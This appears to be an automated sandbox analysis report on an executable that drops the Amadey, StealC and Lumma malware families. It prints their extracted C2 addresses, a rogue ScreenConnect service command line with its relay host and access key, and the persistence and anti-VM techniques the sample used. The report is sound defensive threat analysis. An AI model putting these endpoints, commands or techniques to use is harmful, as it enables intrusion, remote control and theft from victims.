Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/11/2024, 22:25
Static task: static1
General
Target: d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe
Size: 6.0MB
MD5: d7a40118e6d4686b4a11f4ac49ccaf1d
SHA1: d80be69c93759cfd2bb9dec276979e196202aab1
SHA256: d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c
SHA512: a1126fe60f9891131ac9de04f3b1512e7da0197c168c9d1d3d4632ad52eaf002467220bd5b423d3a21212b558daa444cc4cb40a806cf3f06bf0a7b1b6a5137a3
SSDEEP: 98304:7Gb+KW8pO2DH2OP/yErov5MtEkVxXaFwpyAnSWxuv38/oPOYPnAAya0wjSQ/gaY6:7hKW8pRNyUov5Mt9xKFwpBfwrG4z
Malware Config
Extracted (Family: amadey)
4.42
9c9aa5
http://185.215.113.43
install_dir: abc3bc1985
install_file: skotes.exe
strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths: /Zu7JuNko/index.php
Extracted (Family: stealc)
tale
http://185.215.113.206
url_path: /6c4adf523b719729.php
Extracted (Family: lumma)
https://founpiuer.store/api
Signatures
Amadey family
Lumma family
Stealc family
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 8 IoCs)
description | ioc | Process
All 8 IoCs are "Key opened" on \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__; processes, in order: 3s79Z.exe, 155aa5ef5f.exe, 1efbfbe0a1.exe, skotes.exe, skotes.exe, 1K20A9.exe, skotes.exe, 2z8437.exe
Downloads MZ/PE file
Sets service image path in registry (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (d24c72d59e97003e)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (d24c72d59e97003e)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=instance-jo8t3z-relay.screenconnect.com&p=443&s=a79bfa06-e94f-44e4-9b80-51e71f3cd8f7&k=BgIAAACkAABSU0ExAAgAAAEAAQBlgoG8SEwJuyUMAVbS1u9ET8b79k7P%2f7J4ow1fhC2ZualDFO3ArdOiWpDAdhopcBg1REuXbjohRxTcgfk%2fkWJ0WT0qz5dal4OA949TlU4xXVZgsV0RQ27tunoj2Q3J7A0ZtL3jq76NFZjZmVG7GZ8TBeTo5Y06XH33FmoVf9VwzHvTmfCw68ESdxodX61R68SwDT%2feGQQsd4M4MsJXToPLVYZqtW1TRq5D4ltSurcvRmEJarN0C6Zv%2fcAzkHuYmbZkQ9ewAJ6tbcDfe8cR98K4%2f5CyE7xxC2Ljkso4d5K3C2QDFOLofUwV0kLgDGg60cdSrGBhJhxOkipcAOnC%2fXDH&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAr3enNPAhkUuG52MNvdQztwAAAAACAAAAAAAQZgAAAAEAACAAAADf4PYnAGAvxFuJy3KlRour1j702GlM4qES4fV%2bZ9igRgAAAAAOgAAAAAIAACAAAAA7yTIcp6XdEtDObdGkF64R2QdTKbluumlDoWkxECRYdaAEAAAYPeKzr4F%2b9Bh0%2bbvKO5GBarSOt1RrfT4CEoYM3iWHzQc%2ftW%2b3d46NDHgW2qti3aDKws4Ky%2fP%2bnyxnfAqJTzgCvO%2b5RVBAhs1C%2bRtA2Zwz2DEk7t64y7AUuHio%2be6DJcKzNk9B81%2bkdihB3%2fbwJnpA1HVmryAh0jmC964LRIdfMwBqxTxrh1hPml4INEjiCZSpgIrOXeIl%2fjepJk1R8m3SxviZmjMDX3hguUs6XviSCz1pYu8Twxqq3Nrj0yW7jJSLxfDQNYN9TsDX2Pnj7t9XSM1qNvCDqaZb0vcEoUGYBXw0a6iRipomW%2fd3rz0gbCTwByYKlUHbZv4n7BfEKfzKqUS%2fChMnXlwULyU%2fq%2ffLde0ML%2fgvAciEvUf9OJss7YhwsVvSbobzmQZifDrDxDf0L%2bm91wEMDqf7GL6PFS4mi6OWpe8VntnIi25AsBJUprJPOvZRtYW%2fbYNAJFlGMmxuNO9RaVj1Nrp8PF2rnrwHAQEzOHPrWvusNTdETqjygWFHZRT3%2blhF5m0Ou1Sm9zgcQ78bSTKGHoNG0Hm2qwpNwT8D40u4aqzHYUfPrCvdITIhC9Zj84fyZozwk6QUqFd7CCwxlJbNN6LEbZzKKKcsENvbSZ5Elcrp3majNxzK8nYju19tDbCIZ7j8a%2fFop46GvRfhxWsQUfUO46wM7LkIZoC0hTNXG%2fuf2GXcTWQUVGJz0P9Dy9x9cu5DXhj%2fnD09ExotO9QozaNqzIllCv1PDWlXLma7U7KyJWu%2f47xTXGfwFDERRRxU0mpFK6BPB84YZZeeQsUB267SbrCUSq2foqT0wJOGKEL4WWWgNUOmM67DV4rBXORT%2bakoWGLF27BptYJHRYCt7prO36%2fVC%2bn630PULNBC3PmoQ0tBc3lgTMql65uYr%2bnJW1QHnI2ZkPebVL15VHXq4eGbqZOqQaeCrf7t1UpJdMDaOrJwmH0rdUNjOaYrCfPU8v0bzObY6uyksmVMH7w555osQSAH%2bgZ0MVArOQYoT%2fE%2bKaVNG2mjJS%2f%2f41B8YI%2fZxCynkHVfqtpQS8VYAf0ka4EuYVTA5nKHWL%2f3ZL6aQ3F6oYBYBdv8uMQ2mTj7p5QD9k08P5tYbYa2zndEpd6sUYP5HWCz6VdI7XKTUoshpiaZLG8rJEJotGBhTuuQMXbQK2N3mmRc6SDXP7D2c2M7KwJVX2IJIQbbGuZdPu8SgGj1gnyyW9bOl9KZ784o4UK0Mvl1jbwrD0aALJ88SotECO15Spn24ORN4KQ7LFFesdHzwIfWv6AaKuvAtb5q%2fuDjgDoDtbWl46n8vqBBHWOGU%2fynQIyZfJKwGNpVb4As91uDC3Ts9Wkls6jh8y0YGA8%2b%2fCSp8HKB%2f5s1P55%2blyFYWi6k%2bUtjCA8zQj7XxfTpGLpK08WEWa7lq9KYGkGxIrNW7OFdvxgscjZ75FTeoPbo6UiOqMq42oGLBkaFZuvXGIJJwvx9%2bHvhbzEX4R9ONrdufYGPCXickVIZE%2fgrpq4Hd4BdW9RNcoFdbe2JY3UqA6GjYRnSDs9SEEmX9RrejPZDgqskLfRSxhHamcAUJd0yaaKCuG84fKpaKkAAAACqaCrlhWaAL7LWJvKp1pf3esELzt%2bfFhpLvr9dbYuugF4R7f1LuK0U634UPL%2bbdGs6RPwegaCq1CXhuTMFbLlD&c=zhark&c=&c=&c=&c=&c=&c=&c=\"" | ScreenConnect.ClientService.exe
Checks BIOS information in registry (2 TTPs, 16 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1efbfbe0a1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1K20A9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2z8437.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1K20A9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 2z8437.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3s79Z.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1efbfbe0a1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3s79Z.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 155aa5ef5f.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 155aa5ef5f.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
All 3 IoCs are "Key value queried" on \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation; processes, in order: 1K20A9.exe, skotes.exe, zhark.exe
Event Triggered Execution: Component Object Model Hijacking (1 TTP)
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Executes dropped EXE (15 IoCs)
pid | Process
1364 | k3a89.exe
3512 | l3v78.exe
4180 | 1K20A9.exe
2616 | skotes.exe
2228 | 2z8437.exe
1280 | 3s79Z.exe
5000 | 4T753l.exe
1916 | zhark.exe
6068 | 155aa5ef5f.exe
6652 | 1efbfbe0a1.exe
552 | ScreenConnect.ClientService.exe
5624 | ScreenConnect.WindowsClient.exe
6168 | ScreenConnect.WindowsClient.exe
2708 | skotes.exe
6528 | skotes.exe
Identifies Wine through registry keys (2 TTPs, 8 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
All 8 IoCs are "Key opened" on \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine; processes, in order: 3s79Z.exe, 155aa5ef5f.exe, 1efbfbe0a1.exe, skotes.exe, skotes.exe, 1K20A9.exe, skotes.exe, 2z8437.exe
Loads dropped DLL (22 IoCs)
pid | Process
4592 | MsiExec.exe
7152 | rundll32.exe (9 entries)
1664 | MsiExec.exe
5232 | MsiExec.exe
552 | ScreenConnect.ClientService.exe (10 entries)
Adds Run key to start application (2 TTPs, 5 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | l3v78.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\155aa5ef5f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004459001\\155aa5ef5f.exe" | skotes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1efbfbe0a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004460001\\1efbfbe0a1.exe" | skotes.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | k3a89.exe
Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
All 46 IoCs are "File opened (read-only)" by msiexec.exe on drive roots of the form \??\X:, covering every letter A: to Z: except C:, D: and F:, each opened twice. Drive letters in order of occurrence: Y, Z, L, V, J, Q, N, W, A, H, I, O, R, E, R, Y, E, K, M, O, U, V, P, B, N, S, X, Z, P, A, I, T, X, B, G, J, G, K, L, U, Q, S, T, W, H, M
AutoIT Executable (1 IoC)
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x0007000000023cb6-47.dat | autoit_exe
Boot or Logon Autostart Execution: Authentication Package (1 TTP, 1 IoC)
Suspicious Windows Authentication Registry Modification.
description | ioc | Process
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800640032003400630037003200640035003900650039003700300030003300650029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | msiexec.exe
The hex value is a UTF-16LE multi-string and decodes to the two entries msv1_0 and C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsAuthenticationPackage.dll, i.e. the ScreenConnect authentication package DLL dropped under Program Files (see below) is registered with LSA alongside the default MSV1_0 package.
Drops file in System32 directory (3 IoCs)
description | ioc | Process
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d24c72d59e97003e)\zdfh0fmh.tmp | ScreenConnect.ClientService.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d24c72d59e97003e)\zdfh0fmh.newcfg | ScreenConnect.ClientService.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log | ScreenConnect.WindowsClient.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (8 IoCs)
pid | Process
4180 | 1K20A9.exe
2616 | skotes.exe
2228 | 2z8437.exe
1280 | 3s79Z.exe
6068 | 155aa5ef5f.exe
6652 | 1efbfbe0a1.exe
2708 | skotes.exe
6528 | skotes.exe
Drops file in Program Files directory (17 IoCs)
description | ioc | Process
All 17 IoCs are "File created" by msiexec.exe under C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\; files, in order:
ScreenConnect.WindowsClient.exe.config
ScreenConnect.WindowsCredentialProvider.dll
ScreenConnect.WindowsFileManager.exe
Client.resources
ScreenConnect.WindowsBackstageShell.exe.config
ScreenConnect.WindowsFileManager.exe.config
system.config
Client.en-US.resources
ScreenConnect.ClientService.dll
ScreenConnect.Core.dll
ScreenConnect.Windows.dll
ScreenConnect.WindowsAuthenticationPackage.dll
ScreenConnect.WindowsBackstageShell.exe
ScreenConnect.WindowsClient.exe
ScreenConnect.ClientService.exe
Client.de-DE.resources
ScreenConnect.Client.dll
Drops file in Windows directory (14 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\Installer\MSI6C72.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6C42.tmp | msiexec.exe
File created | C:\Windows\Installer\e586b67.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\e586b67.msi | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\SourceHash{94403E12-55EA-5A97-96D0-E794DB360E09} | msiexec.exe
File created | C:\Windows\Installer\wix{94403E12-55EA-5A97-96D0-E794DB360E09}.SchedServiceConfig.rmi | MsiExec.exe
File created | C:\Windows\Installer\e586b69.msi | msiexec.exe
File created | C:\Windows\Installer\{94403E12-55EA-5A97-96D0-E794DB360E09}\DefaultIcon | msiexec.exe
File created | C:\Windows\Tasks\skotes.job | 1K20A9.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\{94403E12-55EA-5A97-96D0-E794DB360E09}\DefaultIcon | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6D5D.tmp | msiexec.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (3 IoCs)
pid | pid_target | Process | procid_target
3000 | 2228 | WerFault.exe | 92
824 | 2228 | WerFault.exe | 92
6516 | 6068 | WerFault.exe | 140
System Location Discovery: System Language Discovery (1 TTP, 22 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
All 22 IoCs are "Key opened" on \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language; processes, in order: d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe, l3v78.exe, taskkill.exe, taskkill.exe, zhark.exe, rundll32.exe, 1K20A9.exe, skotes.exe, taskkill.exe, MsiExec.exe, 155aa5ef5f.exe, MsiExec.exe, 3s79Z.exe, 4T753l.exe, msiexec.exe, MsiExec.exe, ScreenConnect.ClientService.exe, k3a89.exe, 2z8437.exe, taskkill.exe, taskkill.exe, 1efbfbe0a1.exe
Checks SCSI registry key(s) (3 TTPs, 5 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | vssvc.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | vssvc.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = (value not captured in this copy of the report) | vssvc.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | vssvc.exe
Checks processor information in registry (2 TTPs, 10 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | ScreenConnect.WindowsClient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | ScreenConnect.WindowsClient.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Kills process with taskkill (5 IoCs)
pid | Process
4536 | taskkill.exe
4856 | taskkill.exe
776 | taskkill.exe
4068 | taskkill.exe
1476 | taskkill.exe
Modifies data under HKEY_USERS (13 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | ScreenConnect.WindowsClient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ScreenConnect.ClientService.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | ScreenConnect.ClientService.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | ScreenConnect.ClientService.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | msiexec.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | msiexec.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | ScreenConnect.WindowsClient.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | ScreenConnect.WindowsClient.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | ScreenConnect.ClientService.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | ScreenConnect.ClientService.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ScreenConnect.WindowsClient.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | ScreenConnect.WindowsClient.exe
Modifies registry class (38 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\Media\1 = ";" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\UseOriginalUrlEncoding = "1" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\shell\open | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\21E30449AE5579A5690D7E49BD63E090 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\ProductIcon = "C:\\Windows\\Installer\\{94403E12-55EA-5A97-96D0-E794DB360E09}\\DefaultIcon" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\AuthorizedLUAApp = "0" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\Media | msiexec.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\Clients = 3a0000000000 | msiexec.exe
Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | firefox.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\Version = "402849799" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\AdvertiseFlags = "388" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\InstanceType = "0" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\DeploymentFlags = "3" | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\sc-d24c72d59e97003e\shell\open\command | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (d24c72d59e97003e)\\ScreenConnect.WindowsCredentialProvider.dll" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301}\InprocServer32\ThreadingModel = "Apartment" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\21E30449AE5579A5690D7E49BD63E090\Full | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\PackageCode = "21E30449AE5579A5690D7E49BD63E090" | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\sc-d24c72d59e97003e | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (d24c72d59e97003e)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301} | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\444AA45913384B0C2DC4275DE97900E3 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\d24c72d59e97003e\\" | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301}\InprocServer32 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\URL Protocol | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\d24c72d59e97003e\\" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\Net | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\shell\open\command | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\ProductName = "ScreenConnect Client (d24c72d59e97003e)" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\Language = "1033" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\Assignment = "1" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\shell | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-395E-49A3771D6301}\ = "ScreenConnect Client (d24c72d59e97003e) Credential Provider" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\444AA45913384B0C2DC4275DE97900E3\21E30449AE5579A5690D7E49BD63E090 | msiexec.exe
Suspicious behavior: EnumeratesProcesses (28 IoCs)
pid | Process
4180 | 1K20A9.exe (2 entries)
2616 | skotes.exe (2 entries)
2228 | 2z8437.exe (2 entries)
1280 | 3s79Z.exe (2 entries)
5000 | 4T753l.exe (4 entries)
6068 | 155aa5ef5f.exe (2 entries)
6652 | 1efbfbe0a1.exe (2 entries)
4068 | msiexec.exe (2 entries)
552 | ScreenConnect.ClientService.exe (6 entries)
2708 | skotes.exe (2 entries)
6528 | skotes.exe (2 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4068 | taskkill.exe
Token: SeDebugPrivilege | 1476 | taskkill.exe
Token: SeDebugPrivilege | 4536 | taskkill.exe
Token: SeDebugPrivilege | 4856 | taskkill.exe
Token: SeDebugPrivilege | 776 | taskkill.exe
Token: SeDebugPrivilege | 1916 | zhark.exe
Token: SeShutdownPrivilege | 3448 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 3448 | msiexec.exe
